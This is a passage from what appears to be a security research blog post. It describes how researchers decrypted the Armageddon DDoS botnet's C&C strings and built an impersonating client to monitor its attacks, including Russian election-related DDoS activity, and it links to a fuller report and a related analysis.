Of course, once we have taken the liberty of prying open Armageddon’s kimono, it was straightforward to write a “fake Armageddon” client that phones home to the (decrypted) C&C URL strings, and engages in communication that impersonates a real bot. This allows us to gather additional intelligence on the activities and behavioral patterns of Armageddon; in particular, we can now monitor the various Armageddon botnets to log the targets that it attacks, and the types of DDoS floods uses in those attacks. Among other things, this technique allowed us to discover that at least one of the botnets powered by the most recent Armageddon code base took part in the DDos attacks related to the recent Russian election in early December. We will continue to keep a watchful eye on Armageddon going forward.
The full article reporting the details of reversing Armageddon’s crypto, a Python decryption script – and an overview of the findings that were revealed once the strings were decrypted – is available here:
Report: It’s 2012 and Armageddon has arrived

This article is intended to be the first in an upcoming series that will provide a guided tour of the inner workings of various crypto systems that are used by contemporary DDoS malware families in order to hide their communications and sensitive data – and how to go about breaking them!

Update: Today we found some similar analysis of Armageddon and its crypto by the team at Onthar’s Malware Research Laboratory:
http://onthar.in/articles/armageddon-sample-analysis/

Go Back In Time →